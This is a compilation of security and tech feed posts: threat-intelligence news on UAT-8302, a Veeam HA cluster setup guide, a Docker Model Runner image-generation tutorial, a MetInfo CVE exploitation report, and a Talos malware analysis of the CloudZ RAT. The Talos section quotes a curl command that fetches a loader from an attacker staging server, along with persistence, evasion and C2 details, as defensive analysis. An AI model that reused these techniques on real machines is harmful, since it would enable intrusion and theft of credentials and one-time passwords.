Tuesday, May 5, 2026

China-Linked UAT-8302 Targets Governments Using Shared APT Malware Across Regions

A sophisticated China-nexus advanced persistent threat (APT) group has been attributed to attacks targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.

The activity is being tracked by Cisco Talos under the moniker UAT-8302, with post-exploitation involving the deployment of custom-made malware families that have been put to use by other China-aligned hacking groups.

Notable among the malware families is a .NET-based backdoor dubbed NetDraft (aka NosyDoor), a C# variant of FINALDRAFT (aka Squidoor) that has been previously linked to threat clusters known as Ink Dragon, CL-STA-0049, Earth Alux, Jewelbug, and REF7707.

ESET attributes the use of NosyDoor to a group it calls LongNosedGoblin. Interestingly, the same malware has also been deployed against Russian IT organizations by a threat actor referred to as Erudite Mogwai (aka Space Pirates and Webworm), per Russian cybersecurity company Solar, which has given it the name LuckyStrike Agent.

Some of the other tools utilized by UAT-8302 are as follows -

 "Malware deployed by UAT-8302 connects it to several previously publicly disclosed threat clusters, indicating a close operating relationship between them at the very least," Talos researchers Jungsoo An, Asheer Malhotra, and Brandon White said in a technical report published today.

"Overall, the various malicious artifacts deployed by UAT-8302 indicate that the group has access to tools used by other sophisticated APT actors, all of which have been assessed as China-nexus or Chinese-speaking by various third-party industry reports."

It's currently not known what initial access methods the adversary employs to break into target networks, but it's suspected to involve the tried-and-tested approach of weaponizing zero-day and N-day exploits in web applications.

Upon gaining a foothold, the attackers are known to conduct extensive reconnaissance to map out the network, run open-source tools like gogo to perform automated scanning, and move laterally across the environment. The attack chains culminate in the deployment of NetDraft, CloudSorcerer (version 3.0), and VShell.

UAT-8302 has also been observed using a Rust-based variant of SNOWLIGHT called SNOWRUST to download the VShell payload from a remote server and execute it. Besides using custom malware, the threat actor sets up alternative means of backdoor access using proxy and VPN tools like Stowaway and SoftEther VPN.

The findings underscore the trend of advanced collaboration tactics between multiple China-aligned groups. In October 2025, Trend Micro shed light on a phenomenon called Premier Pass-as-a-Service, where initial access obtained by Earth Estries is passed to Earth Naga for follow-on exploitation, clouding attribution efforts. This partnership is assessed to have existed since at least late 2023.

"Premier Pass-as-a-Service provides direct access to critical assets, reducing the time spent on reconnaissance, initial exploitation and lateral movement phases," Trend Micro said. "Although the full extent of this model is not yet known, the limited number of observed incidents, combined with the substantial risk of exposure such a service entails, suggests that access is likely restricted to a small circle of threat actors."



from The Hacker News https://ift.tt/Bxzc5Rn
via IFTTT

How to configure the Veeam High Availability Cluster – Part 1

Veeam Backup & Replication v13 adds High Availability for the backup server. Our latest guide covers the setup path, so you don’t hit dead ends mid-deploy.

Veeam Backup & Replication v13 introduces the High Availability Cluster for Linux-based backup servers, helping keep the backup infrastructure available if the primary Backup Server becomes unavailable. The feature uses two Veeam Software Appliances, a cluster DNS name, a virtual IP address, and configuration database synchronization between the primary and secondary nodes.

In this first part of the series, we’ll walk through the initial HA cluster configuration: checking the prerequisites, enabling High Availability on both appliances, creating the cluster in the Veeam Backup & Replication Console, and connecting to the new cluster endpoint.

Before starting the configuration, make sure both nodes meet the required conditions: the same Veeam version, proper forward and reverse DNS records, static IP addresses in the same subnet, and a Veeam Data Platform Premium license. Local repositories should not be used within the HA cluster.

Prerequisites

To configure a working Veeam High Availability Cluster, you need the following:

  • Linux-based Veeam Backup Server – the configuration of the HA cluster works only with the Linux appliance version of the Veeam Backup Server. A mixed cluster with Windows and Linux Backup Servers is not supported. If a Veeam appliance is already configured and in use in the backup infrastructure, you can deploy a new appliance to use as a secondary node. Keep in mind that local repositories cannot be used within the HA cluster.
  • Veeam version – both nodes must have the same Veeam version installed before creating the HA cluster.
  • Veeam Backup console – to manage the HA cluster, the Veeam console installed on a Windows machine is required.
  • DNS Server – the cluster, primary node and secondary node must be defined in the DNS records in both forward and reverse zones.
  • Layer 2 network – both nodes must reside in the same subnet (layer 2) to establish proper communication.
  • License – the Veeam Data Platform Premium License is required to create the HA cluster.
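As an illustration of the DNS prerequisite, the forward and reverse records might look like the following BIND-style zone fragment. The zone name, host names, and addresses here are assumptions for the example, not values from this guide:

```
; Forward zone (example zone lab.local): cluster name plus both nodes.
veeam-ha      IN A   192.168.1.50   ; cluster DNS name -> virtual IP
veeam-node1   IN A   192.168.1.51   ; primary node
veeam-node2   IN A   192.168.1.52   ; secondary node

; Matching reverse-zone (PTR) records
50  IN PTR veeam-ha.lab.local.
51  IN PTR veeam-node1.lab.local.
52  IN PTR veeam-node2.lab.local.
```

Before creating the cluster, verify that both forward and reverse lookups resolve for all three names.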

How Veeam High Availability cluster works

Once the HA cluster has been created, Veeam leverages a PostgreSQL function to establish which is the primary and which is the secondary node of the cluster. Then, the synchronization between the HA nodes takes place. Changes in the Veeam configuration are always written to the primary node first and then replicated to the secondary node.

 


 

If the secondary node goes offline for more than 10 minutes, a warning is displayed on the notification bar of the primary node and an email alert is sent to the address specified in the global email notification settings. Another email will be sent once the secondary node comes back online.

Upgrading the HA cluster

Veeam leverages the Veeam Updater service to upgrade the HA cluster. During the upgrade operation, the primary node is upgraded first, then the updates are synchronized with the secondary node. Automatic updates on the secondary node are disabled.

Updates available on the secondary node are compared with the updates installed on the primary node, and only the necessary updates are installed on the secondary node.

Configure the Veeam High Availability cluster

Deploy two Veeam Software Appliances that will serve as primary and secondary node of the High Availability Cluster. The secondary node must be a new installation and cannot contain any existing backup data.

Enable High Availability

To create the HA cluster, you must submit a request to enable High Availability on both servers. Using your preferred browser, access Veeam Host Management at https://<IP_Address>:10443. Enter the correct credentials (veeamadmin in the example) and click Sign in.

 


 

Enter the MFA code, then click Sign in.

 


 

Go to the Backup Infrastructure area and click Submit Request in the High Availability section.

 


 

Click OK.

 


 

The request will now show a Waiting for approval status, pending approval by the Security Officer.

 


 

Log in to Veeam Host Management using the Security Officer credentials and click Sign in.

 


 

Enter the MFA code, then click Sign in.

 


 

Select the pending request and click Approve.

 


 

Once approved, exit Veeam Host Management.

 


 

If you log in again using the Backup Administrator credentials, the request will now be displayed as Request approved.

 


 

Repeat the same procedure for the secondary node.

 

Create the HA cluster

Using the Veeam Backup & Replication Console, access the primary node. In the Backup infrastructure area, go to Managed Servers > Linux. Right click the Veeam Backup Server and select Create HA cluster.

 


 

If the Create HA cluster option is not available, it means the Veeam Data Platform Premium License is not installed on the Backup Server.

 


 

Verify that the installed license is the Premium edition.

 


 

Enter the Cluster DNS name created in the DNS Server and the Virtual IP address. Click Next.

 


 

Select the Primary node IP address and type the Secondary node IP address. Specify the correct Credentials to use and click Next.

 


 

Click Continue.

 


 

Click Finish to start the initialization.

 


 

The Veeam High Availability Cluster is being created.

 


 

After the HA cluster has been created, you can easily identify the primary and secondary node.

 


 

Connect to the High Availability Cluster

Once the HA cluster has been created, connect to the infrastructure by entering the HA cluster DNS name in the Veeam Console. Click Connect.

 


 

Click Yes to accept the certificate.

 


 

Enter the credentials and click Sign in.

 


 

The Veeam Backup & Replication v13 main dashboard.

 


 

With the Veeam Backup Server in HA mode, you can quickly recover backup infrastructure functionality if anything goes wrong with the primary node.

Part 2 will cover the manual failover procedure and the configuration required to trigger the failover operation automatically using Veeam ONE.



from StarWind Blog https://ift.tt/8a7SxRU
via IFTTT

Generate Images Locally with Docker Model Runner and Open WebUI

We’ve all been there: you need to generate a few images for a project, you fire up an AI image service, and suddenly you’re wondering what happens to your prompts, how many credits you have left, or why that “safe content” filter rejected your perfectly reasonable request for a dragon wearing a business suit. What if you could skip all of that and run the whole thing on your own machine, with a slick chat UI on top?

That’s exactly what Docker Model Runner now makes possible. With a couple of commands you can pull an image-generation model, connect it to Open WebUI, and start generating images right from a chat interface: fully local, fully private, fully yours.

Let’s build it. Your own private DALL-E, no cloud subscription required.

What You’ll Need

  • Docker Desktop (macOS) or Docker Engine (Linux)
  • ~8 GB of free RAM for a small model (more is better)
  • GPU: optional but highly recommended, NVIDIA (CUDA), Apple Silicon (MPS), or CPU fallback

If you can run docker model version without errors, you’re good to go.

How Docker Model Runner works with Open WebUI

Before we dive in, here’s the big picture:

Generate image with Open WebUI fig 1

Docker Model Runner acts as the control plane. It downloads the model, manages the inference backend lifecycle, and exposes a 100% OpenAI-compatible API — including the POST /v1/images/generations endpoint that Open WebUI already knows how to talk to.

Step 1: Pull an Image Generation Model

Docker Model Runner uses a compact packaging format called DDUF (Diffusers Unified Format) to distribute image generation models through Docker Hub, just like any other OCI artifact.

Pull a model to get started:

docker model pull stable-diffusion

You can confirm it’s ready:

docker model inspect stable-diffusion
{
    "id": "sha256:5f60862074a4c585126288d08555e5ad9ef65044bf490ff3a64855fc84d06823",
    "tags": [
        "docker.io/ai/stable-diffusion:latest"
    ],
    "created": 1768470632,
    "config": {
        "format": "diffusers",
        "architecture": "diffusers",
        "size": "6.94GB",
        "diffusers": {
            "dduf_file": "stable-diffusion-xl-base-1.0-FP16.dduf",
            "layout": "dduf"
        }
    }
}

What’s happening under the hood? The model is stored locally as a DDUF file, a single-file format that bundles all the components of a diffusion model (text encoder, VAE, UNet/DiT, scheduler config) into one portable artifact. Docker Model Runner knows how to unpack it at runtime.

Step 2: Launch Open WebUI

This is a magic trick. Docker Model Runner has a built-in launch command that knows exactly how to wire up Open WebUI against the local inference endpoint:

docker model launch openwebui

That’s it. Behind the scenes this runs:

docker run --rm \
  -p 3000:8080 \
  -e OPENAI_API_BASE=http://model-runner.docker.internal/engines/v1 \
  -e OPENAI_BASE_URL=http://model-runner.docker.internal/engines/v1 \
  -e OPENAI_API_KEY=sk-docker-model-runner \
  ghcr.io/open-webui/open-webui:latest

The model-runner.docker.internal hostname is a special DNS entry that Docker Desktop containers use to reach the Model Runner running on the host, no port-forwarding gymnastics required. If you use Docker CE, you’ll see the docker/model-runner container address instead of model-runner.docker.internal.

Open your browser at http://localhost:3000, create a local account (it stays offline), and you’ll land on the chat interface.

Tip: Want to run it in the background? Add --detach:

docker model launch openwebui --detach

Prefer Docker Compose? See the full setup here: https://docs.docker.com/ai/model-runner/openwebui-integration/
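The `docker run` invocation above maps cleanly onto Compose. As a rough, unofficial sketch (the service name is arbitrary and the linked docs are authoritative), the same wiring might look like:

```yaml
# Sketch of an equivalent Compose service, mirroring the env vars
# from the docker run command above.
services:
  open-webui:
    image: ghcr.io/open-webui/open-webui:latest
    ports:
      - "3000:8080"
    environment:
      OPENAI_API_BASE: http://model-runner.docker.internal/engines/v1
      OPENAI_BASE_URL: http://model-runner.docker.internal/engines/v1
      OPENAI_API_KEY: sk-docker-model-runner
```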

Step 3: Configure Open WebUI for Image Generation

Open WebUI already uses Docker Model Runner for text chat automatically (it reads the OPENAI_API_BASE env var). For image generation you need to point it at the images endpoint too, a 30-second job in the settings UI.

  1. Go to http://localhost:3000/admin/settings/images
  2. Enable Image Generation
  3. Fill in the fields:
     • Model: stable-diffusion
     • API Base URL: http://model-runner.docker.internal/engines/diffusers/v1
     • API Key: whatever-you-want
  4. Click Save.

Why the dummy API key? Docker Model Runner doesn’t require authentication; it’s a local service. The key is only there because Open WebUI’s form requires one. Any non-empty string works.

Step 4: Pull a Chat Model

Open WebUI is also a full-featured chat interface, and one of its best tricks is letting you ask the LLM to generate an image right from the conversation. For that to work, you need a language model too.

# Lightweight option — runs on almost any machine
docker model pull smollm2

# Recommended — more capable, better at understanding creative prompts
docker model pull gpt-oss

Both will show up automatically in the Open WebUI model selector. Use smollm2 if you’re tight on RAM, or gpt-oss if you want richer, more creative responses before image generation.

No extra configuration needed, Open WebUI picks up text models from the same OPENAI_API_BASE endpoint it was already configured with.

Step 5: Generate Your First Image

Head back to the main chat view. You’ll notice a small image icon in the message input bar.

Generate image with Open WebUI fig 2

Click it to toggle image generation mode, type your prompt, and send.

Try something like:

Create an image of a whale.

The first request takes a little longer while the backend loads the model into memory. After that, subsequent images generate much faster.

Generate image with Open WebUI fig 3


Open WebUI will automatically route image-generation requests to the diffusers backend and text requests to the language model, seamlessly, in the same conversation.

Step 6: Generate Images Directly via the API

For developers who want to integrate image generation into their own apps, Docker Model Runner exposes the standard OpenAI Images API directly:

curl -s -X POST http://localhost:12434/engines/diffusers/v1/images/generations \
  -H "Content-Type: application/json" \
  -d '{
    "model": "stable-diffusion",
    "prompt": "A cat sitting on a couch",
    "size": "512x512"
  }'

The response follows the OpenAI Images API format exactly:

{
  "created": 1742990400,
  "data": [
    {
      "b64_json": "/9j/4AAQSkZJRgABAQAAAQABAAD/2wBD..."
    }
  ]
}

Decode and save the image:

curl -s -X POST http://localhost:12434/engines/diffusers/v1/images/generations \
  -H "Content-Type: application/json" \
  -d '{
    "model": "stable-diffusion",
    "prompt": "A cat sitting on a couch",
    "size": "512x512"
  }' | jq -r '.data[0].b64_json' | base64 -d > cat.png


open cat.png
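If you’d rather call the endpoint from Python than curl, here is a minimal sketch using only the standard library. The endpoint path comes from the article; the helper names are mine:

```python
import base64
import json
import urllib.request

# Endpoint path taken from the article; host/port may differ on your setup.
ENDPOINT = "http://localhost:12434/engines/diffusers/v1/images/generations"

def build_payload(prompt, model="stable-diffusion", size="512x512"):
    """Build the JSON body the /v1/images/generations endpoint expects."""
    return json.dumps({"model": model, "prompt": prompt, "size": size}).encode()

def save_first_image(response_json, path):
    """Decode the first b64_json entry of an Images API response to a file."""
    img_bytes = base64.b64decode(response_json["data"][0]["b64_json"])
    with open(path, "wb") as f:
        f.write(img_bytes)
    return len(img_bytes)

def generate(prompt, path="out.png"):
    """POST a prompt to the local endpoint and save the first image."""
    req = urllib.request.Request(
        ENDPOINT,
        data=build_payload(prompt),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return save_first_image(json.load(resp), path)
```

`build_payload` and `save_first_image` can be exercised without a running server; only `generate` performs the actual HTTP call.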

Advanced Parameters

The API supports all the parameters you’d expect from a full diffusers pipeline:

curl http://localhost:12434/engines/diffusers/v1/images/generations \
  -X POST \
  -H "Content-Type: application/json" \
  -d '{
    "model": "stable-diffusion",
    "prompt": "A serene Japanese zen garden, cherry blossoms, koi pond, photorealistic",
    "negative_prompt": "blurry, low quality, distorted, watermark",
    "size": "768x512",
    "n": 2,
    "num_inference_steps": 30,
    "guidance_scale": 7.5,
    "seed": 42,
    "response_format": "b64_json"
  }'| jq -r '.data[0].b64_json' | base64 -d > garden.png

  • prompt: What you want in the image
  • negative_prompt: What you want to avoid
  • size: Resolution as WIDTHxHEIGHT (e.g., 512x512, 768x512)
  • n: Number of images to generate (1–10)
  • num_inference_steps: More steps = higher quality, slower (default: 50)
  • guidance_scale: How closely to follow the prompt (1–20, default: 7.5)
  • seed: Integer for reproducible results; omit for random

Pro tip: Set a seed while you’re iterating on a prompt. Once you’re happy with the composition, remove it to get unique variations.

Under the Hood: How the Diffusers Backend Works

When you first request an image, Docker Model Runner:

  1. Unpacks the DDUF file: extracts the model components and loads them via DiffusionPipeline.from_pretrained()
  2. Starts a FastAPI server: this is the server that Open WebUI and your curl commands talk to through Docker Model Runner

The server is installed on first use by downloading a self-contained Python environment from Docker Hub (version-pinned, so updates are explicit). It lives at ~/.docker/model-runner/diffusers/ — no Python version conflicts, no virtualenv setup.

Troubleshooting

The model takes forever to load on first use. That’s normal: the model weights are being loaded from disk and transferred to GPU memory. Subsequent requests in the same session are much faster because the backend stays warm.

I get a “No model loaded” 503 error. Make sure the model is fully downloaded (docker model list) and that you’re sending the correct model name in the model field.

Image quality is poor / generations are too fast. Increase num_inference_steps (try 20–50 steps). Higher values = slower but sharper results.

Open WebUI can’t connect to the image endpoint. Double-check the URL in Admin Panel → Settings → Images. Inside a Docker container it must be http://model-runner.docker.internal/engines/diffusers/v1, not localhost.

Conclusion and What’s Next

Docker Model Runner makes local image generation simple. It packages and serves image models through an OpenAI-compatible API, while Open WebUI provides an easy chat interface on top. Together, they let you generate images privately on your own machine, either through the browser or directly through the API, without relying on a cloud service.

This feature opens up a lot of possibilities:

  • Multimodal workflows: Chat with a text model about an idea, then immediately generate an image of it — in the same Open WebUI conversation
  • RAG + image generation: Build a pipeline that generates illustrations for your documents
  • Custom models: The diffusers backend supports any DDUF-packaged model, so you can package your own fine-tuned models using Docker’s model packaging tools

The Docker Model Runner team is actively expanding model support on Docker Hub. Check docker model search for the latest available models.



from Docker https://ift.tt/KtAwd7J
via IFTTT

MetInfo CMS CVE-2026-29014 Exploited for Remote Code Execution Attacks

Threat actors are actively exploiting a critical security flaw impacting an open-source content management system (CMS) known as MetInfo, according to new findings from VulnCheck.

The vulnerability in question is CVE-2026-29014 (CVSS score: 9.8), a code injection flaw that could result in arbitrary code execution.

"MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code," the NIST National Vulnerability Database (NVD) states.

"Attackers can exploit insufficient input neutralization in the execution path to achieve remote code execution and gain full control over the affected server."

Per security researcher Egidio Romano, who discovered the vulnerability, the problem is rooted in the "/app/system/weixin/include/class/weixinreply.class.php" script, and stems from a lack of adequate sanitization of user-supplied input when issuing Weixin (aka WeChat) API requests.

As a result, remote, unauthenticated attackers could exploit this loophole to inject and execute arbitrary PHP code. One key prerequisite for successful exploitation when MetInfo is running on non-Windows servers is that the "/cache/weixin/" directory has to exist beforehand. The directory is created when installing and configuring the official WeChat plugin.

Patches for CVE-2026-29014 were released by MetInfo on April 7, 2026. The vulnerability has since come under exploitation as of April 25, with a "small number of exploits" deployed against susceptible honeypots located in the U.S. and Singapore.

Although these efforts were initially sparse and associated with automated probing, the activity surged on May 1, 2026, focusing on China and Hong Kong IP addresses, Caitlin Condon, vice president of security research at VulnCheck, said. As many as 2,000 instances of MetInfo CMS are accessible online, most of which are in China.



from The Hacker News https://ift.tt/jdylYz0
via IFTTT

CloudZ RAT potentially steals OTP messages using Pheno plugin

  • Cisco Talos discovered an intrusion, active since at least January 2026, in which an unknown attacker implanted the CloudZ remote access tool (RAT) and a previously undocumented plugin called “Pheno.”
  • Based on the functionality of the CloudZ RAT and Pheno plugin, the intent was to steal victims’ credentials and potentially one-time passwords (OTPs). 
  • CloudZ utilizes the custom Pheno plugin to hijack the established PC-to-phone bridge by abusing the Microsoft Phone Link application, allowing the plugin to continuously scan for active Phone Link processes and potentially intercept sensitive mobile data like SMS and OTPs without deploying malware on the phone. 
  • CloudZ evades detection by executing critical malicious functions dynamically in system memory and performing checks to avoid debuggers and sandbox environments. 

Attacker abuses the Windows Phone Link application 


Windows Phone Link (formerly "Your Phone") is a synchronization tool developed by Microsoft and built directly into Windows 10 and 11 that bridges a PC and a smartphone (Android or iPhone). By establishing a secure connection via Wi-Fi and Bluetooth, the application mirrors essential phone activities (such as application notifications and SMS messages) onto the computer screen, reducing the user’s need to physically interact with the mobile device while working on the computer. The Phone Link application writes synchronized phone data such as SMS messages, call logs, and the application notification history to the Windows PC in the application’s SQLite database file. 

Talos observed that during an intrusion, an attacker attempted to abuse the Windows Phone Link application using the CloudZ RAT and its Pheno plugin. The Pheno plugin is designed to monitor an active PC-to-phone bridge established by the Phone Link application on the victim machine. With confirmed Phone Link activity on the victim's machine, the attacker using the CloudZ RAT can potentially intercept the Phone Link application’s SQLite database file (e.g., “PhoneExperiences-*.db”) on the victim machine, potentially compromising SMS-based OTP messages and other authenticator application notification messages. 
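To illustrate what interception of such a database could involve, the sketch below enumerates the tables in any SQLite file via the sqlite_master catalog. The actual Phone Link schema is not documented in this post, so no table names are assumed:

```python
import sqlite3

def list_tables(db_path):
    """Enumerate table names in an SQLite file (e.g., a Phone Link
    "PhoneExperiences-*.db" database) via the sqlite_master catalog."""
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute(
            "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name"
        ).fetchall()
        return [name for (name,) in rows]
    finally:
        con.close()
```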

Intrusion summary of CloudZ infection 

Talos discovered from telemetry data that the intrusion began with an unknown initial access vector into the victim's environment, which led to the execution of a fake ScreenConnect application update executable. This malicious executable drops and executes an intermediate .NET loader executable, which subsequently deploys the modular CloudZ on the victim’s machine. Upon execution, the RAT decrypts its configuration data, establishes an encrypted socket connection to the command-and-control (C2) server, and enters its command dispatcher mode.

CloudZ executes C2 commands to exfiltrate credentials from the victim machine's browser data, and it downloads and implants a plugin. The plugin performs reconnaissance of the Microsoft Phone Link application on the victim machine and writes the reconnaissance data to an output file in a staging folder. CloudZ reads back the Phone Link application data from the staging folder and sends it to the C2 server. 

Rust-compiled executable used as a dropper 

Talos discovered a Rust-compiled 64-bit executable, disguised with file names such as “systemupdates.exe” or “Windows-interactive-update.exe”, functioning as a loader. The malicious loader was compiled on Jan. 1, 2026, and contains the developer string rustextractor.pdb.

When the loader is run on the victim machine, it decrypts and drops an embedded .NET loader binary disguised as a text file with the file names “update.txt” or “msupdate.txt” in the folder “C:\ProgramData\Microsoft\windosDoc\”. 

Figure 1. Excerpt of rusty dropper code.

In another instance, Talos observed that the .NET loader was implanted in the victim machine by downloading it from an attacker-controlled staging server using the command shown below:  

curl -L -o C:\ProgramData\Microsoft\WindowsDoc\update[.]txt hxxps[://]calm-wildflower-1349[.]hellohiall[.]workers[.]dev

The dropper executes an embedded PowerShell script to establish persistence on the victim machine through a scheduled Windows task that executes the dropped malicious .NET loader. The PowerShell script achieves this by first performing a runtime check to determine whether the dropped .NET loader is already active on the system. It queries all running processes using the Get-CimInstance Win32_Process command and filters for any instance of regasm.exe with command line parameters that include the string update.txt. If such an instance is found, the script silently exits without taking any action. 

If the check indicates that the .NET loader is not running, the script proceeds to establish persistence by creating a scheduled task named SystemWindowsApis in the scheduled task folder \Microsoft\Windows\. It configures the task to trigger at system startup /sc onstart, execute under the SYSTEM account /ru SYSTEM with the highest privilege level /rl HIGHEST, and the /f flag ensures it will silently overwrite any existing task with the same name, allowing the malware to update its persistence mechanism. The script configures the task scheduler action to run the .NET loader by utilizing the living-off-the-land binary (LOLBin) regasm.exe, which is the .NET Framework Assembly Registration Utility located at “C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\”. It provides the path of the dropped .NET loader as the argument to regasm.exe with the /nologo flag. After creating the task, the script immediately triggers it with schtasks /run, ensuring it executes immediately and survives future reboots. 

Figure 2. Excerpt of the PowerShell script to establish persistence on victim machines. 
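Putting the described flags together, the scheduled-task creation would resemble the following reconstruction. This is an analyst's sketch for illustration only, built from the flags named in the write-up, not the attacker's actual script:

```python
def build_schtasks_create(task_name, loader_path):
    """Reconstruct (for illustration) the schtasks invocation described:
    run at startup, as SYSTEM, highest privileges, overwriting any
    existing task, with regasm.exe launching the dropped loader."""
    regasm = r"C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\regasm.exe"
    return (
        f'schtasks /create /tn "\\Microsoft\\Windows\\{task_name}" '
        f"/sc onstart /ru SYSTEM /rl HIGHEST /f "
        f'/tr "{regasm} /nologo {loader_path}"'
    )
```

Defenders can hunt for this pattern: a task under \Microsoft\Windows\ whose action is regasm.exe pointed at a non-assembly file such as a .txt path.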

.NET loader implants the CloudZ RAT 

Talos found that the attacker embedded CloudZ, an encrypted .NET-compiled RAT, in the .NET loader executable. 

When the .NET loader is triggered through the Windows Task Scheduler, it performs detection evasion checks, beginning with a timing-based check in which it measures the actual elapsed time of a sleep command to detect whether it is executing in an analysis environment. It then enumerates running processes on the victim machine against a list of security tools, including network sniffers like Wireshark and Fiddler, as well as system monitors like Procmon and Sysmon. The .NET loader exits if any of these are detected in the victim environment. 

Figure 3. Excerpt of the .NET loader binary with detection evasion instructions.
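The timing-based check works because many sandboxes fast-forward sleeps to speed up analysis. A minimal Python sketch of the idea (threshold values are illustrative; the loader's actual constants are unknown):

```python
import time

def sleep_was_fast_forwarded(seconds=0.25, tolerance=0.05):
    """Measure how long a sleep actually took; if it returned well
    before the requested duration, assume delays are being skipped
    (a common sandbox trait the loader checks for)."""
    start = time.monotonic()
    time.sleep(seconds)
    elapsed = time.monotonic() - start
    return elapsed < (seconds - tolerance)
```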

The loader then conducts hardware and environment checks to identify virtual machine (VM) or sandbox characteristics. It verifies that the system has at least two processor cores and searches for strings like “VIRTUAL” or “SANDBOX” within the system directory path, computer name, user domain, and the current victim username.  

Figure 4. Excerpt of the .NET loader binary with detection evasion instructions. 

The loader executable embeds multiple chunks of hexadecimal strings in the binary, which are concatenated sequentially during execution, reassembling a massive hexadecimal data blob. The loader converts the hexadecimal strings to bytes and performs bytewise XOR decryption using the single-byte key 0xCA. If the decrypted payload is a .NET assembly, the loader runs it reflectively. Otherwise, it writes the decrypted payload to the folder “%TEMP%\{GUID}” and runs it as a process.  

Figure 5. Excerpt of the .NET loader to execute the .NET payload module. 
Figure 6. Excerpt of the .NET loader to execute the non-.NET payload executables. 

Modular CloudZ RAT delivered as payload 

Talos discovered that CloudZ, a modular RAT, is delivered as the payload in the current intrusion. CloudZ is a .NET executable compiled on Jan. 13, 2026, and is obfuscated with ConfuserEx.  

Figure 7. The RAT binary shows the malware name, CloudZ. 

CloudZ employs layers of defense against analysis environments and reverse engineering. It queries the _ENABLE_PROFILING environment variable via the GetEnvironmentVariable Windows API to detect whether a .NET profiler or debugger is attached to the RAT process on the victim machine. It uses the .NET “System.Reflection.Emit.DynamicMethod” type combined with “ILGenerator” to create executable functions dynamically during execution. 

CloudZ relies on configuration data embedded in the binary as a resource, which it decrypts and loads into memory during execution. The decrypted configuration data includes various C2 commands, PowerShell scripts for data archive extraction, multiple file download methods, paths and names of staging folders, multiple HTTP headers, and the URLs of the staging servers. 

Figure 7. CloudZ primary configuration data decrypted in memory. 

After decrypting the configuration data, CloudZ decodes the Base64-encoded strings to obtain the URL of the staging server where the secondary configuration is stored.  

Figure 8. CloudZ function that downloads the secondary configuration data from the staging server. 

Talos found that the RAT downloads and processes secondary configuration data through the URLs “hxxps[://]round-cherry-4418[.]hellohiall[.]workers[.]dev/?t=1773406370” or “hxxps[://]pastebin[.]com/raw/8pYAgF0Z?t=1771833517” and extracts the C2 server IP address “185[.]196[.]10[.]136” and port number 8089, establishing connections over TCP sockets. 
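The retrieval flow can be approximated as follows. The exact on-the-wire format of the secondary configuration is not public; the single-line "ip:port" layout and the `parse_c2` helper below are assumptions made purely for illustration:

```python
# Hypothetical sketch of the secondary-configuration handling: download a
# small text body from a staging URL, then extract the C2 host and port.
# The "ip:port" format is an assumption, not CloudZ's confirmed layout.
import urllib.request

def fetch_secondary_config(url, timeout=10):
    """Download the secondary configuration body from a staging URL."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")

def parse_c2(config_body):
    """Assumed layout: '<ip>:<port>' on a single line."""
    host, _, port = config_body.strip().partition(":")
    return host, int(port)

# Offline example using the IOC values from the report (re-fanged):
host, port = parse_c2("185.196.10.136:8089")
```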

Pivoting on the Pastebin URL indicator, we found that the attacker used the Pastebin handle “HELLOHIALL” and hosted the secondary configuration data at several Pastebin URLs.  

Figure 9. Attacker-controlled Pastebin hosting the secondary configuration data.
Figure 10. Attacker’s Pastebin account hosting multiple nodes of secondary configuration data. 

The RAT rotates between three hardcoded user-agent strings to blend its HTTP traffic with legitimate browser requests from the victim machine. Every HTTP request includes the anti-caching headers “Cache-Control: no-cache, no-store, must-revalidate”, “Pragma: no-cache”, and “Expires: 0”, which prevent intermediate proxies and CDN infrastructure from caching C2 or staging server details.  

User-agent headers used by CloudZ are: 

  • Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 
  • Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 
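A request-header builder along these lines might look like the sketch below. Whether CloudZ rotates its user agents round-robin or randomly is not stated in the report; round-robin is an assumption here:

```python
# Illustrative header builder: the three hardcoded user agents plus the
# anti-caching headers listed in the report. Round-robin rotation is an
# assumption for demonstration.
import itertools

USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 "
    "(KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36",
]
_ua_cycle = itertools.cycle(USER_AGENTS)

def build_headers():
    """One rotated user agent plus the fixed anti-caching headers."""
    return {
        "User-Agent": next(_ua_cycle),
        "Cache-Control": "no-cache, no-store, must-revalidate",
        "Pragma": "no-cache",
        "Expires": "0",
    }
```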

After the RAT establishes the C2 connection, it enters a command dispatcher module that relies on the decrypted configuration data loaded into memory. The configuration data contains Base64-encoded command identifiers, which the RAT matches against the commands received from the C2 server to perform its various functions. The commands supported by CloudZ are shown in the table below: 

| Base64-encoded command | Decoded command | Purpose |
| --- | --- | --- |
| cG9uZw== | pong | Heartbeat response |
| UElORyE= | PING! | Heartbeat request |
| Q0xPU0U= | CLOSE | Terminate RAT process |
| SU5GTw== | INFO | Collect OS edition, architecture, and hardware details from the victim machine |
| UnVuU2hlbGw= | RunShell | Execute shell command |
| QnJvd3NlclNlYXJjaA== | BrowserSearch | Browser data exfiltration |
| R2V0V2lkZ2V0TG9n | GetWidgetLog | Phone Link recon logs and data exfiltration |
| cGx1Z2lu | plugin | Load plugin |
| c2F2ZVBsdWdpbg== | savePlugin | Save plugin to disk in the staging directory C:\ProgramData\Microsoft\whealth\ |
| c2VuZFBsdWdpbg== | sendPlugin | Upload plugin to C2 |
| UmVtb3ZlUGx1Z2lucw== | RemovePlugins | Remove all deployed plugin modules |
| UmVjb3Zlcnk= | Recovery | Recovery or reconnect routine |
| RFc= | DW | Download and write file operations |
